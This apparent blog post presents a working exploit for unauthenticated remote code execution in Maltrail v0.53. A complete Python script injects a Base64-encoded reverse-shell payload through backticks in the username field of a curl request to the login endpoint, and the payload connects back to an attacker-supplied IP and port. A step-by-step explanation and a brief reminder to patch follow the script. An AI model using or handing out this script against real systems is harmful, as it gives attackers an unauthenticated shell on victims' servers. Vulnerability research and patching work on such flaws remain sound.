Exploiting Maltrail v0.53 — Unauthenticated Remote Code Execution (RCE)
--
In this blog post, we will delve into an exploit for Maltrail v0.53, which allows for unauthenticated remote code execution (RCE). This vulnerability has been assigned the identifier CVE-2023–27163.
Overview:
Exploit Title: Maltrail v0.53 — Unauthenticated Remote Code Execution (RCE)
Exploit Author: Iyaad Luqman K (init_6)
Application: Maltrail v0.53
Tested on: Ubuntu 22.04
CVE: CVE-2023–27163
Proof of Concept (PoC):
The exploit leverages a vulnerability in the Maltrail application to execute arbitrary code on the target system. The code provided below demonstrates the exploit in action:
import sys
import os
import base64
def main():
listening_IP = None
listening_PORT = None
target_URL = None
if len(sys.argv) != 4:
print("Error. Needs listening IP, PORT and target URL.")
return(-1)
listening_IP = sys.argv[1]
listening_PORT = sys.argv[2]
target_URL = sys.argv[3] + "/login"
print("Running exploit on " + str(target_URL))
curl_cmd(listening_IP, listening_PORT, target_URL)
def curl_cmd(my_ip, my_port, target_url):
payload = f'python3 -c \\'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{my_ip}",{my_port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")\\''
encoded_payload = base64.b64encode(payload.encode()).decode() # encode the payload in Base64
command = f"curl '{target_url}' --data 'username=;`echo+\\"{encoded_payload}\\"+|+base64+-d+|+sh`'"
os.system(command)
if __name__ == "__main__":
main()How the Exploit Works:
- The exploit script requires three arguments: the listening IP, listening PORT, and the target URL.
- The script constructs a payload that, when executed, will create a reverse shell connection back to the attacker’s machine.
- This payload is then encoded using Base64 to obfuscate its contents.
- A curl command is constructed to send the payload to the target URL, specifically the login endpoint.
- If successful, the payload is executed on the target system, granting the attacker a shell on the victim machine.
Diagram:
This exploit highlights the importance of regularly updating and patching software. Maltrail v0.53 has a critical vulnerability that allows attackers to execute arbitrary code on the target system without authentication. It’s essential to be aware of such vulnerabilities and take appropriate measures to mitigate them.
